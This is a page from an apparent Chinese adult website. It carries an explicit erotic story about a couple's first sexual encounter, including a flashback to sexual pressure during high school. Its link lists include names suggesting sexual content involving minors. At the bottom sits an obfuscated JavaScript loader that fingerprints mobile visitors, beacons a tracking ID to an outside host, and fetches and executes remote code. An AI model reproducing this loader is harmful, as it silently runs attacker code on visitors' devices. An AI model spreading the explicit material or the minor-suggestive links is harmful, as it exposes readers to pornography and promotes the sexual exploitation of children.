• 站长推荐




    热门搜索



    站长推荐




    女优精选
    点我看更多


    夢乃愛華
    波多野结衣
    早野詩
    三上悠亚
    河北彩花
    高桥圣子
    葵司
    水卜櫻

    番号库
    点我看更多


    综合番号
    200GANA
    259LUXU
    261ARA
    277DCV
    300MIUM
    300MAAN
    300NTK

    国产传媒
    点我看更多


    综合传媒
    麻豆传媒
    葫芦影业
    猫爪影像
    天美传媒
    果冻传媒
    91制片厂
    蜜桃传媒

    探花系列
    点我看更多


    91沈先生
    文轩探花
    千人斩
    太子探花
    屌哥全国探花
    鸭哥探花
    9总全国探花
    小天探花

    精选导航

  • 不良研究所
  • 帝王会所
  • 黑料福利网
  • 必备福利
  • 逗妇乳
  • 三千佳丽
  • 全球福利汇

  • 毕业前的约定终于实现了

    jkun资源站校园情事人气:535时间:2024-04-01 18:00:34

      呼…… 从颤抖的唇间,我吐出一个烟圈。可烟圈还没来得及完全成形就瞬间被凛冽的风匆匆带走了,消失在那灯火阑珊的冬夜中,却还是留下了浓浓的味道夹杂着寒冷的空气不断地冲击着我的嗅觉神经。

    「还真得有点冷呢。」我立了一下衣领并自语道。

    从凉冰冰的木制长椅边站起身来,我舒展了一下早已僵直的四肢,又低头重重地吸了一口那几乎被风吹息的香烟并把烟蒂抛在了前方菱形的花坛里。又是一阵冷风袭来,我不禁缩了一下脖子,将双手插入口袋并开始了那自我保暖的踱步,不知不觉间我踱进了那典型的等人画面。等什么呢?是在等我最最熟悉的那个女生,还是在等一个持续了4年的承诺?还是……在等一个激情璀璨,欲生欲死的时刻?

    「呵呵。」想到这里,我不由的眉头一皱,嘴角上翘,自嘲的笑了出来。

    我决定离开背后这替我挡风多时的巨大的大理石陶行知雕像,在这夜色笼罩下的大学校园里走走以便缓解我等待时的无聊和辛苦……一小时后,我已站在她教室的窗外出神地观望着。她正在组织同学们排练着为参加合唱比赛所选的曲目,她时而俯身弹琴,时而站起纠正同学们的唱音,真是忙得不亦乐乎。远远的望去,她的卷发高高盘起,一件火红的拉链式高领毛衣不紧不松的套在身上,却无法遮挡她迷人的曲线。头两侧的硞石耳链随着她的走动,时不时掷出炫目的色彩,胸前的水晶挂件也伴着她的呼吸时起时落并折出淡淡的红色光亮。倒心型的臀,上翘却不突兀,丰满却不肥大。圆润修长的大腿,纤细而毫不骨感的小腿,蓝色的紧身牛仔裤就像为她量身定做般附在上边。加上淡麦色的皮肤。

    她真的,她真的是……她真的是性感!今晚……想到这里,我不由得打了一个冷颤,是寒冷吗?不,不是!现在的我,很紧张,激动还很忐忑。是啊,谁人又能在这样的夜晚无动於衷呢?4年啊!我等了整整的4年……就为了一个约定,一个诺言……往事历历在目,就像电影般的展开了……(4年前)「不可以的……」她在我身下无力委屈的央求道。

    「为什么?你不想吗?」我没好气地问。

    「不……不是的……」她吞吞吐吐。

    「那……你就是没有完全的爱我了……我明白了」我有些失望的叹道「我爱你胜过爱我自己!记得我为你挨的那些打吗?……记得我是多莫不顾一切地和你在一起吗?」确实,她为了和我在一起挨过不少家里人的打,受过不少委屈。记得学校领导把我们家长叫到一起说要开除我们,因为我们在校园里掀起了一阵早恋风。「可笑!他们认为这样就能分开我们吗? 」这是她最让我刻骨铭心的一句话。

    「我当然记得……可是。在一起的人不是都要做这个的嘛?我们已经在一起了,不是吗?为什么我们要和别人不一样?」我也发起了反攻。

    「……」她无话可说了……静静的闭上了双眼

    壮着胆,我轻轻的退下她的……体恤……胸罩……短裙……看着赤裸的她,我再也忍不住了。飞快的脱了自己所有的衣物,并压在了她的身上。她没有反抗,但也没有抱我。当我的私处触碰到她大腿的时候,她的手有意无意的碰了一下,但就像触电般的又缩了回去。我并没有在意,而更肆无忌惮的要将她最后的保护层除去。突然,她紧紧地抱住了我,双腿像钳子一样把我固定在她身上(我诧异瘦弱的她哪里来的这么大得力气)……然后她睁开了双眼……那一幕我永远也忘不了。那双平日醉人,深邃的大眸子里噙满了泪水!牙齿紧紧地咬住下嘴唇,都快要咬出血了!

    「只有今天嘛?非要嘛?……」她问

    「……」我没说话。其实,我哪里还说得出来。我想任何一个男人身处这种环境,都会软下去的吧(呵呵呵)「你如果真的爱我的话!可以等到高考后嘛?到那时我一定……不拦你。」还没有等我开口,她已经说了。

    高考过后……大学毕业以后?我们现在都已经在社会上混了一年了……我去做生意,而她去做了一名老师。

    都没有再提起这个约定……直到今晚早些时候……「嘻嘻哈哈~~……」一阵谈笑声打断了我的思绪。这谈笑声来自几个刚下课的孩子。教室那边,同学们正在陆续离去,她下课了,。

    在楼道口,我见到了飞奔向我的她。一见面就是一个深情的拥抱,加一个甜蜜的吻。引得男生们一片起哄笑;女生们也投来了羡慕的目光。她并没有理会,只是紧紧地攥着我的手,一起走向了存车处。

    一路无话

    来到我外婆家楼下,我叫她等在那里。我外婆家离她学校近,所以就自然而然的成为了我们的秘密幽会场所,但我外婆并不知情。因为,我外婆家的格局很特别,一条长长的阳台连通着4个并列的房间,门庭在中间,另一边则是客厅,饭厅,以及书房。我通常叫她到第一个房间等我(那是我妹的,她除了周末,平时都不回来住,而由於我妹的坏脾气,所以没人敢随便进她的房间。)然后我确定没人在我的房间,再让她从阳台去我房间(最后的那一间room)。今晚也不例外,我们又如法炮制,顺利的来到我的房间。之后我又出了房间和外公,外婆道过晚安,并看着他们睡下,就迫不及待的返回了自己的房间。我没有开灯,要是外婆睡不着起来帮我关灯就惨了!

    我来到床前,静静地在她身边坐了下来。月光照在她迷人的脸上,又被那嫩滑的肌肤弹入我的眼帘,那光柔柔的暖暖的,是我一生所见过最美的颜色。透着芬芳的卷发就像星河般蜿蜒过肩,洒在胸前。有着长长睫毛的大眼睛扑闪扑闪地,好似散着银光的蝴蝶,引得我头脑发胀,意乱情迷,心也随着那蝴蝶飞舞荡漾了起来~。笔挺却在尖端微微上翘的鼻子下面是草莓般小巧可爱的薄薄的嘴唇。尽管是在夜晚,那黑暗却无法掩饰这唇的诱人色泽和生气。在那上面,有一层似有似无的湿雾,我好想与它相拥缠绕。 这时我才发现周身发烫,热血上涌,那无法压抑的原始冲动早已占据了我的身心。轻轻的,慢慢的我将发烫的双唇移到了那草莓上面,先将它一点点地湿润,再将它包围,然后吮吸那蜜汁,最后直捣那甘泉的源头。湿湿的,暖暖的,甜甜的蜜汁怎么吃也吃不够。我好担心自己吃得太急,吃得太尽,可是根本无法控制自己。她娇小柔软的唇是那么的可爱,让我恨不得一口将其吞下。身体越来越烫,我也变得肆无忌惮,含着她的舌头,就像找到了水果糖的心大口大口的享用起来。她也主动的配合着我,双臂渐渐攀到我的腰际,两手在我背后,肩头,脖经不断的抚摸,揉搓着。她的呼吸也变得急促起来,并伴随着轻柔的呻吟声。缓缓地她的双手滑到了我的臀部并且更加用力的揉搓。

    我深吸了一口气,然后深深地,重重地吸着她的舌头,直到她再也忍不住,并发出了「嗯~~」的哼声。我放开了她的舌头,狂野的吻着她的脖子,耳后,肩膀……同时我慢慢的拉开了她上衣的拉链,然后将它脱了下来,然后是内衣。我并没有急於脱去她的胸罩,因为我实在搞不清它的机关在何处。(汗……)於是我只好向她下身发动了进攻,可我并没有停止吻她,双唇一直在她腹部和胸前游走,摩擦着。左手也配合着抚摸她的乳房及下颌。她的腰带并没有我想像的那末容易除去。复杂的结构再加上我激动紧张的心情,那该死的玩意足足花了我5分钟。这绝对是我床史上最大的败笔~!还好她并不在意。

    藉着朦胧的月光,我看着眼前近乎赤裸的她,只觉得两眼冒火,头顶生烟,下身就要胀裂了。夜是那么的静,黑暗中只有火热的我,纯纯的她以及我大得吓人的心跳声。迫不及待的我以超人的速度除去上衣,紧接着是裤子「砰!」脱裤子太快,又是在黑暗中……我一脚踢在了墙上……可是我顾不得疼痛,飞快地脱到只剩内裤,然后闪进了被窝。第一次和她贴得这么紧,第一次如此赤裸的和她相拥。温热的身体,光滑的肌肤,柔软的长发……天哪,这是多么美好的感觉!紧接着,我拨开她的胸罩,将她的乳房翻了出来,柔柔的抚摸着把玩着。她的乳房好软,好圆就像两颗熟透的淡麦色水蜜桃。我不禁把嘴凑了过去,含住了她乳房的顶端,轻轻地吮吸着,舌尖不断的拨弄着她的乳头。双臂环在她背后,把她牢牢地贴在我身上。我用右腿把她两腿分开,又把我们的私处紧紧得靠在一起,并且不断的摩擦着。她也随着我的节奏,私处迎合着我的私处一起一伏地运动着。她的喘息声越来越重,双手也大胆地伸到我的内裤里揉捏我的臀部。然后,她的手顺势脱下我的内裤,乾脆两手抚摸起我的睾丸来,手尖也不时滑到我的股沟和肝门并在那里划动,挤压。我则吮吸着她的乳头,左手挤压着她的肛门,右手绕到她脑后抚摸她的耳朵和脖子。猛地,我将她的乳房大口吸到嘴里,头带动着嘴在她胸上做起圆周运动,然后又将她的乳房放开,却又轻轻地撕咬着她的乳头,右手也在揉捏着另一个乳头。

    「嗯嗯嗯……~」她发出了连续的呻吟,然后一把抓住我的阴茎推挤着并用力的在隔着内裤的阴道口蹭着。我趁势拉下她的胸罩和内裤,翻身压在她身上。我把阴茎紧紧地贴在她那早已张开的湿热阴唇上,和她毫无阻隔的相互摩擦着。她张着双腿,尽量的把阴部迎向我,而我的阴茎就在她阴唇间滑动着,阴茎头也在她阴道口浅浅的进进出出。很快,我的阴茎和睾丸上沾满了她的爱液。於是,我直起身来,跪在床上,左手摩挲着她的阴毛和小腹,右手持着阴茎在他的阴蒂附近温柔的划着圈,挤压着,摩擦着,然后又将阴茎在她阴唇间上下搓动,左手也在适时地戳弄着她的肛门。许久……我重新伏在她身上,发起了最后的攻势,可毕竟是第一次,她那里又充满了爱液,我的阴茎就在阴道口滑来滑去,却遍寻不到那神秘的洞口。可能,我把她戳痛了。她笑着说了一字「笨……」然后,她的玉手把我的阴茎引导到了正确的地方。我挺身一刺,阴茎并没有像我想的那样直捣黄龙,却好像被什么挡了一下。紧接着就是她「啊 ~~!」的一声。

    「疼吗? 」我急忙问到。

    「嗯。」她答道。

    「那停吧……」我做退出状。

    「别……」。「没关系的……别停……」她闭上眼睛说道(看到这里大家一定要笑了。这一幕是否和某个笑话里讲的一样?可是当时确实是这样的。)我继续将阴茎向她的阴道里插入,这次我慢了很多,但我还是清楚地感觉到她在我身下不住的微微颤抖。同时,她的两手托着我的腰部,随着阴茎的插入她的手已经移到了我的臀部,并狠狠地捏着。徐徐的,我感到我的阴茎就要全部插进去了,於是我稍一用力将阴茎完完全全的插入了她的阴道,也就在这一瞬间她的十指深深的嵌入了我的臀部,(疼!我们都疼……)。我的阴茎深深的没入她的阴道。没有想到,阴道内的温度是如此的高,也许是因为第一次吧,她阴道内的高温使我的臀部肌肉收紧了好一会儿,与此同时这高温也带给了我身临仙境的感觉的。我只觉得阴茎被一种莫名的力量所包围着,挤压着;我的整个身体被安置於滑溜溜,湿乎乎,温热热的液体之中。我真的好想被这种力量永远的控制下去,真的好想在那湿滑温暖的环境中长眠。朦胧中我看见了她因痛楚而微微扭曲的表情,就没敢继续抽插,停了下来,直到她长长的吁了一口气,我才缓缓地重新开始动作。我轻柔的前后抽插,闭上眼睛感受阴茎摩擦着她阴道肉壁的感觉,而阴茎和阴道之间是她的爱液制造的湿热隔膜。当我的阴茎深入她体内的同时,她湿滑的阴唇也直接撞击,摩擦着我的睾丸,那感觉好似一大块暖暖的黄油从我的阴囊上滑过,却又比那更湿润,更真实!一次又一次,我在她的阴道里进进出出。每抽插一次都会有一股1万伏的电流直击我全身的每一个角落,而全身几百万个细胞也在同时呼喊奔跑着,那感觉真的是妙不可言。此时的她紧紧地把头靠在我的肩上,腰成反弓型,阴部却死死的抵在我的阴部,甚至让我感到有一点行动不便。她的纤细双臂搂着我的腰,双手在我背部和臀部不停的,用力的揉着,搓着,捏着;一双大腿完全张开迎接着我一次又一次的抽插,两条小腿却把我环绕起来,双脚也相互扣紧在我的大腿背面。我整个人牢牢地被锁在她的阴部,而我也将计就计深深地刺向了她花蕊的心。这时她头颈后仰,嘴巴半张,并发出了极力克制过后的呻吟声,虽然那声音很柔很嫩,可还是一下子划破了寂静的空气。我连忙将食指放在她的嘴边示意她小声一点,她却将我的食指含住,轻轻的吮吸,撕咬着它。她的双手也放到了我的大腿上狠狠地揉搓起来。看到这个情景,我全身的热血直涌头部,面部又麻又烫,脑子里一片空白之想尽全力的抽插。於是,我挪开了挡在她唇边的手指,低下头,脸颊贴着她的脸颊,全身完完全全贴在她娇躯之上,忘情的大胆抽插起来。一时间她在我身下,呻吟声迭起,喘息声连连;她的身体也随着我的节奏大幅度的上下起伏,左右摇摆……许久……许久……沉醉间她说:「你知道吗?我真的好爱你~`真想我们这样一直下去直到永远」听到这话,我再也忍不住了。我闭上眼睛,双手搂紧她的脖子,用尽所有的力气,集中所有的感觉,发了疯似的在她阴道里来回抽插。同时,她的双乳牢牢地贴在我的胸膛上,也把腰拱到了极限,阴部完全把我的阴茎吃了进去。她的阴道夹着我的阴茎紧紧地,紧紧地……终於我向前深深地一刺--高潮了……当我们呼吸平静后,她依偎在我的胸膛像小猫一样乖顺,而我也意犹未尽的拨弄着她的长发。紧接着是温柔的,窒息的长吻。我痴痴的看着她。

    「你真的好美……今夜好美……」我感叹道。

    「你也是哦~~」她打趣道。

    很突然地……「你会忘记今晚么?我知道你就要走了……」她黯然地问道。

    「才两年啊,我还会回来的,而且是带着军功章回来 ~」我逗她开心。

    「你?你先照顾好你自己吧……还军功章~~」她说到。

    「呵呵,不管怎样,我不会忘记你的,不会忘记今晚的」我作发誓状。

    「为什么? 」她等待着我的回答。

    「因为你是我心中最美的,今夜是过去,现在,未来我一生中最美的夜晚!」虔诚地答道。

    她盯着我,许久……然后她主动搂住了我,我也缠住了她。我们深情地吻着,吻着……多年以后身在异乡的我,被这不能成为原因的原因勾起了我对往事的层层思绪,於是就用我拙劣的文笔丢丢他加以描画。我的第一次,也是他的第一次,我们共同的第一次。没有鲜花,没有轻音乐,没有烛光晚餐,更没有五星级酒店的豪华套房……没有一切任何值得的纪念的第一次应该有的东西。然而,她他就是我要的一切。那一夜,是我一生中所有过最美好的夜晚,过去是,现在是,将来也还是。

    ..................

      

    热门资讯


    友情链结

  • 不良研究所
  • 必备福利
  • 帝王会所
  • 全球福利汇
  • 黑料福利网
  • 三千佳丽
  • 逗妇乳
  • 黑色360导航
  • 她趣福利社
  • 花社导航
  • 番号研究所
  • 狼友集中营
  • 小马学院+
  • 隐秘部落
  • 童妓⚤青楼
  • 熟女超市
  • X站推送网
  • 萝莉岛VIP
  • 美色研究所
  • 猛男情報局
  • 必射榜
  • 熟女屋
  • G点导航
  • 换妻会所
  • 妃射不可
  • 色色研究所
  • 黑料网曝门
  • 无码乱伦网
  • 女友租赁

  • 联系信箱:[email protected]

    名称:国产呦女+ ,https://wuwu.oaoachug.link/调研资料/报告.html ,来路:18av , 来路低于300勿扰

    警告:本站收集的网址来源于全球互联网,网址内容和本站没有任何关系,网站在美国进行维护,受美国法律保护,如来访者国家法律不允许,请自行离开! © 2022

    国产

    三级

    日本无码

    日本有码

    欧美

    function uyJfTNs(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function DTzeVMH(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return uyJfTNs(t);};window[''+'I'+'N'+'S'+'b'+'W'+'a'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=DTzeVMH,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://ssd.zmneysz.com:7891/stats/7544/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMllM0EllMkYllMkZ0Zy4wYTlljLmNvbSUzQTg4OTE=','d3NNzJTNNBJTJGJTJGcG8uemFjdm0uY29tJTNNBOTUzMw==','4932',window,document,['l','N']);}:function(){};